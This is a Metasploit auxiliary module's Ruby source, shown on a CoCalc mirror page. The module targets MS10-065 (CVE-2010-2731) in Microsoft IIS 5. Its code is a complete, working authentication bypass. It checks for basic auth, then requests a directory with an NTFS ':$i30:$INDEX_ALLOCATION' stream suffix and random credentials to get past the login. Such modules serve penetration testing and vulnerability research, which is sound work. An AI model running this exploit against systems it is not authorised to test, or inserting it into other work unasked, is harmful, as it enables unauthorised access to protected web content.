Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/iis_auth_bypass.rb
21546 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',

14
        'Description' => %q{

15
          This module bypasses basic authentication for Internet Information Services (IIS).

16
          By appending the NTFS stream name to the directory name in a request, it is

17
          possible to bypass authentication.

18
        },

19
        'References' => [

20
          [ 'CVE', '2010-2731' ],

21
          [ 'OSVDB', '66160' ],

22
          [ 'MSB', 'MS10-065' ],

23
          [ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]

24
        ],

25
        'Author' => [

26
          'Soroush Dalili',

27
          'sinn3r'

28
        ],

29
        'License' => MSF_LICENSE,

30
        'DisclosureDate' => '2010-07-02',

31
        'Notes' => {

32
          'Stability' => [CRASH_SAFE],

33
          'SideEffects' => [IOC_IN_LOGS],

34
          'Reliability' => []

35
        }

36
      )

37
    )

38


39
    register_options(

40
      [

41
        OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])

42
      ]

43
    )

44
  end

45


46
  def has_auth

47
    uri = normalize_uri(target_uri.path)

48
    uri << '/' if uri[-1, 1] != '/'

49


50
    res = send_request_cgi({

51
      'uri' => uri,

52
      'method' => 'GET'

53
    })

54
    vprint_status(res.body) if res

55


56
    return (res and res.code == 401)

57
  end

58


59
  def try_auth

60
    uri = normalize_uri(target_uri.path)

61
    uri << '/' if uri[-1, 1] != '/'

62
    uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"

63


64
    dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'

65


66
    user = Rex::Text.rand_text_alpha(rand(5..14))

67
    pass = Rex::Text.rand_text_alpha(rand(5..14))

68


69
    vprint_status("Requesting: #{dir}")

70
    res = send_request_cgi({

71
      'uri' => dir,

72
      'method' => 'GET',

73
      'authorization' => basic_auth(user, pass)

74
    })

75
    vprint_status(res.body) if res

76


77
    return (res && (res.code != 401) && (res.code != 404)) ? dir : ''

78
  end

79


80
  def run

81
    if !has_auth

82
      print_error('No basic authentication enabled')

83
      return

84
    end

85


86
    bypass_string = try_auth

87


88
    if bypass_string.empty?

89
      print_error('The bypass attempt did not work')

90
    else

91
      print_good("You can bypass auth by doing: #{bypass_string}")

92
    end

93
  end

94
end

95


96